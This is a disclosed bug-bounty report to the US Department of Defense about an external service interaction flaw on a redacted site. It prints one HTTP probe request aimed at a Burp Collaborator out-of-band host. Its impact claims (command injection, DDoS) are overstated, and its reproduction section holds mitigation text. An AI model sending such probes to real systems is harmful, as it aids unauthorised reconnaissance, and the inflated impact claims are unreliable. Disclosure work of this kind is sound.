External service interaction ( DNS and HTTP ) in www.████████

Disclosed: 2023-06-23 18:19:31 By 0xmzm To deptofdefense
High
Vulnerability Details
There is External service interaction ( DNS and HTTP ) vulnerability in www.█████████ Here is an example request : ``` GET http://9eoecirvai3o4lsdrpqzvyia71dr1g.oastify.com/ HTTP/1.1 Host: www.██████ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.██████/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close ``` And the Burp Collaborator recived this information : DNS request recived from : ████████ HTTP request recived from : ███ ███ █████████ ## Impact The External Service Interaction arise when it is possible for a attacker to induce application to interact with the arbitrary external service such as DNS HTTP etc. The External Service Interaction can is not limited to HTTP,HTTPS or DNS, you can lead to FTP, SMTP etc. Such weakness can lead to DDoS attack. The External Service Interaction can lead to OS Command Injection, DOS Attack, DDOS Attack or Code Manipulation. ## System Host(s) www.████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Use whitelist check, boundary based validation and sanitization. Maintain whitelist at network and web front. Review Source Code for functions such as dns.resolve() , dns.query() , sys_exec() etc. ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 1704024
  • State: Closed
  • Substate: resolved
  • Upvotes: 10
Share this report